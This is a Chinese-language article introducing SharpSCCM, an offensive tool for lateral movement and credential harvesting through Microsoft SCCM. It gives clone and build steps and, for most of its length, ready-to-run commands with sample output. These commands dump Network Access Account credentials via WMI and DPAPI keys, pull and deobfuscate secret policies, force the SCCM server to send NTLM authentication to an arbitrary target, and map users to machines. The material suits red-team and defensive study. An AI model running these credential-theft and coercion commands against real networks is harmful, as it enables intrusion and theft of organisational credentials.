SharpSCCM:一款利用SCCM實現橫向滲透的強大工具
VSole2022-12-20 18:25:09
關于SharpSCCM
SharpSCCM是一款功能強大的橫向滲透和憑證收集工具,該工具主要利用了微軟終端配置管理器(SCCM)來實現其功能,并能夠通過訪問SCCM管理終端GUI來實現橫向滲透和憑證收集。
功能介紹
1、后滲透功能,支持橫向滲透;
2、支持從SCCM客戶端請求NTLM認證;
3、支持收集網絡訪問賬號(NAA)的憑證信息;
4、請求和反混淆NAA憑證;
5、支持濫用新發現的攻擊原語來強制來自SCCM服務器的NTLM身份驗證;
工具下載
廣大研究人員可以使用下列命令將該項目源碼克隆至本地:
git clone https://github.com/Mayyhem/SharpSCCM.git (向右滑動、查看更多)
項目構建
將項目源碼克隆至本地之后,在Visual Studio中打開SharpSCCM.sln,然后選擇目標,比如說Release > x64。
接下來,構建解決方案(Ctrl + Shift + B)即可。
此時,將在目標路徑下生成一個SharpSCCM程序集,其中包含了所有的工具及依賴組件,路徑為:
.\SharpSCCM\bin\x64\Release\SharpSCCM_merged.exe。
命令行使用
命令樣例:
SharpSCCM.exe [command] [options]
自命令樣例:
add 支持將對象添加到其他對象 get 查詢指定對象,并顯示對象內容 exec 從指定UNC路徑執行一個應用程序,或從客戶端設備請求NTLM身份認證 invoke 在服務器上執行或調用操作 local 與本地工作站/服務器交互 new 在服務器上創建新的對象 remove 從服務器刪除對象 (向右滑動、查看更多)
工具使用
通過WMI導出NAA并使用DPAPI主密鑰進行解密:
SharpSCCM.exe local naa wmi
樣例輸出:
.\SharpSCCM.exe local naa wmi _______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | |
[*] Retrieving Network Access Account blobs via WMI
[+] Connecting to \\localhost\root\ccm\policy\Machine\ActualConfig
[+] Executing WQL query: SELECT * FROM CCM_NetworkAccessAccount
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: <REDACTED>
[*] m/u : <REDACTED>
[*] SYSTEM master key cache:
{340f2212-5765-4e57-8931-070fadb401c2}:<REDACTED>
{3c58124e-ef4e-4841-900c-3183550720b3}:<REDACTED>
{226f00ce-7ab9-4fff-a7e0-665e7afb2785}:<REDACTED>
{6641ae28-12b2-4e79-abe4-2199ac0245b1}:<REDACTED>
[*] Triaging Network Access Account Credentials
Plaintext NAA Username : APERTURE\networkaccess
Plaintext NAA Password : <REDACTED>
(向右滑動、查看更多)
請求設備策略并獲取NAA憑證
SharpSCCM.exe get naa -u <computer$> -p <password> (向右滑動、查看更多)
樣例輸出:
.\SharpSCCM.exe get naa -u chell$ -p <password>
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | |
[+] Connecting to \\localhost\root\ccm
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
[+] Current management point: atlas.aperture.sci
[+] Site code: PS1
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Wrote "ConfigMgr Client Messaging" certificate to My store for CurrentUser
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: CAVE-JOHNSON-PC.APERTURE
NetBIOS name: CAVE-JOHNSON-PC
Authenticating as: chell$
Site code: PS1
[+] Sending HTTP registration request to atlas.aperture.sci:80
[+] Received unique GUID for new device: GUID:A7FC423E-FF62-48B1-8A42-9447178D16C5
[+] Obtaining Full Machine policy assignment from atlas.aperture.sci PS1
[+] Found 43 policy assignments
[+] Found policy containing secrets:
ID: {096db290-7e52-41cb-839c-b8af87b82abf}
Flags: RequiresAuth, Secret, IntranetOnly, PersistWholePolicy
URL: http://<mp>/SMS_MP/.sms_pol?{096db290-7e52-41cb-839c-b8af87b82abf}.4_00
[+] Adding authentication headers to download request:
ClientToken: GUID:A7FC423E-FF62-48B1-8A42-9447178D16C5;2022-10-17T23:24:00Z;2
ClientTokenSignature: 9BAF8C2981B17DE0E056C42E8E4605B72A0559CE30C245E06CADC65A25A37D342595B6DCC542ABB9C20A01E9D1E71B1E8B52E8CF6B9C6214C76CA1C636B301031E15E8A53D1A2E52E18416F6A77F1BD8D793184995D93423E1F346E6B131CE07908DC26FB20CCF09F1B1FC2318104C7145B69D6870819CB9B35C8F87C3CB311211F84BA812EC15AAD7C3E512BF73D67A5AA7EA180E07E35E712CC69DF034183BA89C5937AC3EF954E5B3D8401172B6C0850695436180FD3A4185F4702F2647AE1E747BD5D64707123F003958CF110E7191CE5D299F97CCE4D01965F92496C748DD0F0A20CDB3F469C8BB5A33340142CD91B8F1C7D3082EC6B86080072783390A
[+] Received encoded response from server for policy {096db290-7e52-41cb-839c-b8af87b82abf}
[+] Successfully decoded and decrypted secret policy
[+] Deleted "CN=ConfigMgr Client Messaging" certificate from My store for CurrentUser
[+] Encrypted NAA username: 89130000...<REDACTED>...6C006F00
[+] Encrypted NAA password: 89130000...<REDACTED>...8D3C0000
[+] Done! Encrypted NAA hex strings can be decrypted offline using the "DeobfuscateNAAString.exe <string>" command
..\..\..\DeobfuscateNAAString\Release\DeobfuscateNAAString.exe 89130000...<REDACTED>...06C006F00
Plaintext: APERTURE\networkaccess
..\..\..\DeobfuscateNAAString\Release\DeobfuscateNAAString.exe 89130000...<REDACTED>...8D3C0000
Plaintext: <REDACTED>
(向右滑動、查看更多)
橫向滲透:調用client-push
強制SCCM服務器通過SMB向目標<target>發送NTLM身份認證:
SharpSCCM.exe <server> <sitecode> invoke client-push -t <target> (向右滑動、查看更多)
強制SCCM服務器通過HTTP向目標<target>發送NTLM身份認證:
SharpSCCM.exe <server> <sitecode> invoke client-push -t <target@port> (向右滑動、查看更多)
樣例輸出:
PS C:\Users\cave.johnson.APERTURE\SharpSCCM\bin\x64\Release> .\SharpSCCM.exe atlas ps1 invoke client-push -t 192.168.57.130 [+] Discovering local properties for client registration request [+] Modifying client registration request properties ClientFqdn: 192.168.57.130 NetBiosName: 192.168.57.130 SiteCode: ps1 [+] Registration Request Body: <...snip...> [+] Sending HTTP registration request to atlas:80 [+] Received unique GUID for new device: GUID:19B65F3B-AAD8-41C1-B4BE-E6917FA0B8BE [+] Discovering local properties for DDR inventory report [+] Modifying DDR and inventory report properties [+] Discovered PlatformID: Microsoft Windows NT Server 10.0 [+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0 [+] DDR Body: <...snip...> [+] Inventory Report Body: <...snip...> [+] Sending DDR from GUID:19B65F3B-AAD8-41C1-B4BE-E6917FA0B8BE to MP_DdrEndpoint endpoint on atlas:ps1 and requesting client installation on 192.168.57.130 (向右滑動、查看更多)
橫向滲透:獲取primary-user
使用<username>主用戶獲取設備列表:
SharpSCCM.exe <server> <sitecode> get primary-user -u <username> (向右滑動、查看更多)
樣例輸出:
.\SharpSCCM.exe atlas ps1 get primary-user -u chell [+] Connecting to \\atlas\root\SMS\site_ps1 [+] Executing WQL query: SELECT * FROM SMS_UserMachineRelationship WHERE UniqueUserName LIKE '%chell%' ----------------------------------- SMS_UserMachineRelationship ----------------------------------- CreationTime: 20220528005101.523000+000 IsActive: True RelationshipResourceID: 25165825 ResourceClientType: 1 ResourceID: 16777227 ResourceName: GLADOS Sources: 2 Types: 1 UniqueUserName: aperture\chell ----------------------------------- (向右滑動、查看更多)
許可證協議
本項目的開發與發布遵循GPL-3.0開源許可證協議。
項目地址
SharpSCCM:https://github.com/Mayyhem/SharpSCCM
參考資料:
https://enigma0x3.net/2016/02/29/offensive-operations-with-powersccm/
https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867
https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9
https://blog.xpnsec.com/unobfuscating-network-access-accounts/
https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a
https://docs.microsoft.com/en-us/mem/configmgr/core/clients/deploy/plan/security-and-privacy-for-clients
VSole
網絡安全專家